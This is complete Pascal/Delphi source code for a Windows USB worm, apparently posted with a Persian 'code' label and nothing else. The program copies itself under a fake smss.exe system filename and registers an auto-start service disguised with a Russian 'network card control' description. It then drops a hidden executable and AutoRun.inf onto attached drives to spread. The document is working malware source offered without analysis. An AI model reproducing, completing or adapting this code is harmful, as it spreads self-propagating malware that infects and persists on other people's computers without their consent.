کد:
Program WormUsb;
const
ServiceName = 'NetKard';
ServiceDisp = 'Сервис контроля сетевой карты';
Path = '\system32\drivers\smss.exe';
TimeOut = $400;
TypeWorm = 'usbworm';
SizeWorm = $A75;
NameWorm = 'usbsystem.exe';
user32 = 'user32.dll';
kernel32 = 'kernel32.dll';
advapi32 = 'advapi32.dll';
SERVICE_RUNNING = $4;
SERVICE_WIN32_OWN_PROCESS = $10;
SERVICE_WIN32_SHARE_PROCESS = $20;
SERVICE_WIN32 = (SERVICE_WIN32_OWN_PROCESS or
SERVICE_WIN32_SHARE_PROCESS);
SERVICE_START_PENDING = $2;
SC_MANAGER_CREATE_SERVICE = $2;
STANDARD_RIGHTS_REQUIRED = $F0000;
SERVICE_AUTO_START = $2;
SERVICE_ERROR_NORMAL = $1;
SC_MANAGER_CONNECT = $1;
SERVICE_START = $10;
SERVICE_QUERY_STATUS = $4;
SERVICE_INTERACTIVE_PROCESS = $100;
MAX_PATH = 260;
INFINITE = INTEGER($FFFFFFFF);
GENERIC_READ = INTEGER($80000000);
FILE_SHARE_READ = $1;
FILE_ATTRIBUTE_NORMAL = $80;
OPEN_EXISTING = 3;
SW_HIDE = 0;
FILE_SHARE_WRITE = $2;
CREATE_ALWAYS = 2;
GENERIC_WRITE = $40000000;
type
HINST = INTEGER;
THandle = INTEGER;
UINT = INTEGER;
DWORD = INTEGER;
LPDWORD =^INTEGER;
BOOL = BOOLEAN;
pathbuf = array [0..MAX_PATH] of char;
SERVICE_TABLE_ENTRYA = record
lpServiceName : PChar;
lpServiceProc : Pointer;
end;
SERVICE_STATUS = record
dwServiceType : DWORD;
dwCurrentState : DWORD;
dwControlsAccepted : DWORD;
dwWin32ExitCode : DWORD;
dwServiceSpecificExitCode : DWORD;
dwCheckPoint : DWORD;
dwWaitHint : DWORD;
end;
PSecurityAttributes = ^TSecurityAttributes;
TSecurityAttributes = record
nLength : Cardinal;
lpSecurityDescriptor : Pointer;
bInheritHandle : Boolean;
end;
TWndClassEx = packed record
cbSize : Integer;
style : Integer;
lpfnWndProc : Pointer;
cbClsExtra : Integer;
cbWndExtra : Integer;
hInstance : integer;
hIcon : Integer;
hCursor : Integer;
hbrBackground : Integer;
lpszMenuName : PChar;
lpszClassName : PChar;
hIconSm : Integer;
end;
TPoint = packed record
X : Longint;
Y : Longint;
end;
TMSG = packed record
hwnd : Integer;
message : integer;
wParam : Longint;
lParam : Longint;
time : integer;
pt : TPoint;
end;
TOVERLAPPED = Packed record
Internal : LongWORD;
InternalHigh : LongWORD;
Offset : LongWORD;
OffsetHigh : LongWORD;
hEvent : THandle;
end;
POverlapped = ^TOVERLAPPED;
var
wc : TWndClassEx;
Wnd : Integer;
Mesg : TMsg;
hThread : THandle;
DispatchTable : SERVICE_TABLE_ENTRYA;
ServiceStatus : SERVICE_STATUS;
ServiceStatusHandle : integer;
function DefWindowProc(hWnd: Integer; Msg: UINT; wParam: Integer; lParam: Integer): Integer; stdcall; external user32 name 'DefWindowProcA';
function SetServiceStatus(hServiceStatus: integer; var lpServiceStatus: SERVICE_STATUS): BOOL; stdcall; external advapi32 name 'SetServiceStatus';
function RegisterServiceCtrlHandler(lpServiceName: PChar; lpHandlerProc: pointer): integer; stdcall;external advapi32 name 'RegisterServiceCtrlHandlerA';
function OpenSCManager(lpMachineName, lpDatabaseName: PChar; dwDesiredAccess: DWORD): INTEGER; stdcall; external advapi32 name 'OpenSCManagerA';
function CreateService(hSCManager: INTEGER; lpServiceName, lpDisplayName : PChar; dwDesiredAccess, dwServiceType, dwStartType, dwErrorControl: DWORD; lpBinaryPathName, lpLoadOrderGroup: PChar; lpdwTagId: LPDWORD; lpDependencies, lpServiceStartName, lpPassword: PChar): INTEGER; stdcall; external advapi32 name 'CreateServiceA';
function CloseServiceHandle(hSCObject: INTEGER): BOOL; stdcall; external advapi32 name 'CloseServiceHandle';
function OpenService(hSCManager: INTEGER; lpServiceName: PChar; dwDesiredAccess: DWORD): INTEGER; stdcall; external advapi32 name 'OpenServiceA';
function StartService(hService: INTEGER; dwNumServiceArgs: INTEGER; var lpServiceArgVectors: PChar): BOOL; stdcall; external advapi32 name 'StartServiceA';
function QueryServiceStatus(hService: INTEGER; var lpServiceStatus: SERVICE_STATUS): BOOL; stdcall; external advapi32 name 'QueryServiceStatus';
function StartServiceCtrlDispatcher(var lpServiceStartTable: SERVICE_TABLE_ENTRYA): BOOL; stdcall; external advapi32 name 'StartServiceCtrlDispatcherA';
procedure Sleep(dwMilliseconds: DWORD); stdcall; external kernel32 name 'Sleep';
function CreateThread(lpThreadAttributes: Pointer; dwStackSize: DWORD; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: DWORD; var lpThreadId: DWORD): THandle; stdcall; external kernel32 name 'CreateThread';
function WaitForSingleObject(hHandle: THandle; dwMilliseconds: DWORD): DWORD; stdcall; external kernel32 name 'WaitForSingleObject';
function CloseHandle(hObject: THandle): BOOL; stdcall; external kernel32 name 'CloseHandle';
function CreateFile(lpFileName: PChar; dwDesiredAccess, dwShareMode: DWORD; lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: DWORD; hTemplateFile: THandle): THandle; stdcall; external kernel32 name 'CreateFileA';
function GetModuleFileName(hModule: HINST; lpFilename: PChar; nSize: DWORD): DWORD; stdcall; external kernel32 name 'GetModuleFileNameA';
function GetWindowsDirectory(lpBuffer: PChar; uSize: UINT): UINT; stdcall; external kernel32 name 'GetWindowsDirectoryA';
function lstrcpy(lpString1, lpString2: PChar): PChar; stdcall; external kernel32 name 'lstrcpyA';
function lstrcat(lpString1, lpString2: PChar): PChar; stdcall; external kernel32 name 'lstrcatA';
function WinExec(lpCmdLine: PChar; uCmdShow: INTEGER): INTEGER; stdcall; external kernel32 name 'WinExec';
function RegisterClassEx(const WndClass: TWndClassEx): Word; stdcall; external user32 name 'RegisterClassExA';
function GetMessage(var lpMsg: TMsg; hWnd: integer; wMsgFilterMin, wMsgFilterMax: integer): boolean; stdcall; external user32 name 'GetMessageA';
function TranslateMessage(const lpMsg: TMsg): boolean; stdcall; external user32 name 'TranslateMessage';
function DispatchMessage(const lpMsg: TMsg): integer; stdcall; external user32 name 'DispatchMessageA';
function CreateWindowEx(dwExStyle: integer; lpClassName: PChar; lpWindowName: PChar; dwStyle: integer; X, Y, nWidth, nHeight: Integer; hWndParent: integer; hMenu: integer; hInstance: integer; lpParam: Pointer): integer; stdcall; external user32 name 'CreateWindowExA';
function SetTimer(hWnd: integer; nIDEvent, uElapse: integer; lpTimerFunc: pointer): integer; stdcall; external user32 name 'SetTimer';
function GetLogicalDriveStrings(nBufferLength: INTEGER; lpBuffer: PChar): INTEGER; stdcall; external kernel32 name 'GetLogicalDriveStringsA';
function GetDriveType(lpRootPathName: PChar): INTEGER; stdcall; external kernel32 name 'GetDriveTypeA';
function WriteFile(hFile: THandle; const Buffer; nNumberOfBytesToWrite: INTEGER; var lpNumberOfBytesWritten: INTEGER; lpOverlapped: POverlapped): BOOLEAN; stdcall; external 'kernel32.dll' name 'WriteFile';
function SetFileAttributes(lpFileName: PChar; dwFileAttributes: DWORD): BOOL; stdcall; external kernel32 name 'SetFileAttributesA';
function GetFileAttributes(lpFileName: PChar): DWORD; stdcall; external kernel32 name 'GetFileAttributesA';
function ReadFile(hFile: INTEGER; var Buffer; nNumberOfBytesToRead: INTEGER; var lpNumberOfBytesRead: INTEGER; lpOverlapped: POverlapped): BOOLEAN; stdcall; external 'kernel32.dll' name 'ReadFile';
function lstrcmp(lpString1, lpString2: PChar): Integer; stdcall; external kernel32 name 'lstrcmpA';
function lstrlen(lpString: PChar): Integer; stdcall; external kernel32 name 'lstrlenA';
function QueryPerformanceCounterX(var lpPerformanceCount: LongInt): BOOLEAN; stdcall; external kernel32 name 'QueryPerformanceCounter';
function SysVolInfExists(const Disk: PChar): Boolean;
var
Code : Integer;
Buf : PathBuf;
begin
LStrCpy(Buf,#0);
LStrCat(Buf,Disk);
LStrCat(Buf,'System Volume Information');
Code := GetFileAttributes(Buf);
Result := (Code <> -1) and ($10 and Code <> 0);
end;
function FileExists(path:PChar):boolean;
var
i : integer;
begin
i:=CreateFile(path, GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if i=-1
then Result:=false
else Result:=true;
end;
Procedure CopyFileX(FromF,ToF:PChar);
var
buf : array[1..SizeWorm] of byte;
f1h : integer;
f2h : integer;
CRD : integer;
begin
f1h:=CreateFile(FromF,GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING, 0,0);
f2h:=CreateFile(ToF,GENERIC_WRITE,0,nil,CREATE_ALWAYS,0,0);
ReadFile(f1h, Buf, SizeWorm, CRD, nil);
WriteFile(f2h, Buf, CRD, CRD, nil);
CloseHandle(f1h);
CloseHandle(f2h);
SetFileAttributes(ToF,$22);
end;
function WindowProc(wnd:Integer; Msg : Integer; Wparam:Longint; Lparam:Longint):LongInt; stdcall;
var
B : integer;
i1 : integer;
i2 : integer;
i3 : integer;
i4 : integer;
F1 : pathbuf;
F2 : pathbuf;
F3 : pathbuf;
F4 : pathbuf;
FH : integer;
Buf : array [0..95] of char;
Begin
if Msg=275 then
begin
GetModuleFileName(0,F1,MAX_PATH);
GetLogicalDriveStrings(96,Buf);
for i1:=0 to 25 do
if Buf[i1*4+2]<>#92 then break;
if Buf[0]=#65 then i4:=1 else i4:=0;
for i2:=i4 to i1-1 do
begin
i3:=GetDriveType(@Buf[i2*4]);
if (i3<>0)
and (i3<>1)
and (i3<>5)
and (not SysVolInfExists(@Buf[i2*4])) then
begin
LStrCpy(F2,#0);
LStrCat(F2,@Buf[i2*4]);
LStrCat(F2,NameWorm);
LStrCpy(F3,#0);
LStrCat(F3,@Buf[i2*4]);
LStrCat(F3,'AutoRun.inf');
if not FileExists(F2) or FileExists(F3) then
begin
CopyFileX(F1,F2);
LStrCpy(F4,#0);
LStrCat(F4,'[AutoRun]'#13#10'open=');
LStrCat(F4,NameWorm);
LStrCat(F4,#13#10'shell\open\Command=');
LStrCat(F4,NameWorm);
LStrCat(F4,#13#10'shell\open\Default=1'#13#10'shell\explore\Command=');
LStrCat(F4,NameWorm);
FH := CreateFile(F3, GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, 0, 0);
WriteFile(FH, F4[0], 116, B, nil);
CloseHandle(FH);
SetFileAttributes(F3,$22);
end;
end;
end;
end
else Result:=DefWindowProc(wnd,msg,wparam,lparam);
End;
procedure ServiceCtrlHandler; stdcall;
begin
SetServiceStatus(ServiceStatusHandle, ServiceStatus);
end;
procedure MainServiceThread; stdcall;
begin
sleep(INFINITE);
end;
procedure ServiceProc(argc: DWORD; var argv: array of PChar); stdcall;
var
thID : integer;
begin
ServiceStatus.dwServiceType := SERVICE_WIN32;
ServiceStatus.dwCurrentState := SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted := 0;
ServiceStatus.dwWin32ExitCode := 0;
ServiceStatus.dwServiceSpecificExitCode := 0;
ServiceStatus.dwCheckPoint := 0;
ServiceStatus.dwWaitHint := 0;
ServiceStatusHandle := RegisterServiceCtrlHandler(ServiceName, @ServiceCtrlHandler);
ServiceStatus.dwCurrentState := SERVICE_RUNNING;
ServiceStatus.dwCheckPoint := 0;
ServiceStatus.dwWaitHint := 0;
SetServiceStatus(ServiceStatusHandle, ServiceStatus);
wc.cbSize:=sizeof(wc);
wc.lpfnWndProc:=@WindowProc;
wc.lpszClassName:=TypeWorm;
RegisterClassEx(wc);
Wnd:=CreateWindowEx ( 0, TypeWorm, nil, 0, 0, 0, 0, 0, 0, 0, 0, nil);
SetTimer(Wnd,600,TimeOut,nil);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;
hThread := CreateThread(nil, 0, @MainServiceThread, nil, 0, ThID);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
end;
function CreateNTService(ExecutablePath, ServiceName: PChar): boolean;
var
hNewService : INTEGER;
hSCMgr : INTEGER;
FuncRetVal : Boolean;
begin
FuncRetVal := False;
hSCMgr := OpenSCManager(nil, nil, SC_MANAGER_CREATE_SERVICE);
if (hSCMgr <> 0) then
begin
hNewService := CreateService(hSCMgr, ServiceName, ServiceDisp,
STANDARD_RIGHTS_REQUIRED, SERVICE_WIN32_OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,
ExecutablePath, nil, nil, nil, nil, nil);
CloseServiceHandle(hSCMgr);
if (hNewService <> 0) then
FuncRetVal := true
else
FuncRetVal := false;
end;
CreateNTService := FuncRetVal;
end;
function ServiceStart(aServiceName: PChar ): boolean;
var
h_manager : INTEGER;
h_svc : INTEGER;
svc_status : SERVICE_STATUS;
Temp : PChar;
dwCheckPoint : DWord;
begin
svc_status.dwCurrentState := 1;
h_manager := OpenSCManager(nil, nil, SC_MANAGER_CONNECT);
if h_manager > 0 then
begin
h_svc := OpenService(h_manager, aServiceName,
SERVICE_START or SERVICE_QUERY_STATUS);
if h_svc > 0 then
begin
temp := nil;
if (StartService(h_svc,0,temp)) then
if (QueryServiceStatus(h_svc,svc_status)) then
begin
while (SERVICE_RUNNING <> svc_status.dwCurrentState) do
begin
dwCheckPoint := svc_status.dwCheckPoint;
Sleep(svc_status.dwWaitHint);
if (not QueryServiceStatus(h_svc,svc_status)) then break;
if (svc_status.dwCheckPoint < dwCheckPoint) then break;
end;
end;
CloseServiceHandle(h_svc);
end;
CloseServiceHandle(h_manager);
end;
Result := SERVICE_RUNNING = svc_status.dwCurrentState;
end;
var
F1 : pathbuf;
F2 : pathbuf;
F3 : pathbuf;
F4 : pathbuf;
i1 : integer;
i2 : integer;
begin
GetModuleFileName(0,F1,MAX_PATH);
i2:=lstrlen(F1);
for i1:=i2 downto 0 do
if F1[i1]=#92 then break;
if Lstrcmp(@F1[i1+1],NameWorm)=0 then
begin
LStrCpy(F4,#0);
LStrCat(F4,F1);
F4[3]:=#0;
LStrCpy(F2,#0);
LStrCat(F2,'explorer ');
LStrCat(F2,F4);
winexec(F2,1);
end;
GetWindowsDirectory(F3, MAX_PATH);
LStrCpy(F2,#0);
LStrCat(F2,F3);
LStrCat(F2,path);
if not FileExists(F2) then
begin
CopyFileX(F1,F2);
CreateNTService(F2, ServiceName);
ServiceStart(ServiceName);
exit;
end;
DispatchTable.lpServiceName := ServiceName;
DispatchTable.lpServiceProc := @ServiceProc;
StartServiceCtrlDispatcher(DispatchTable);
end.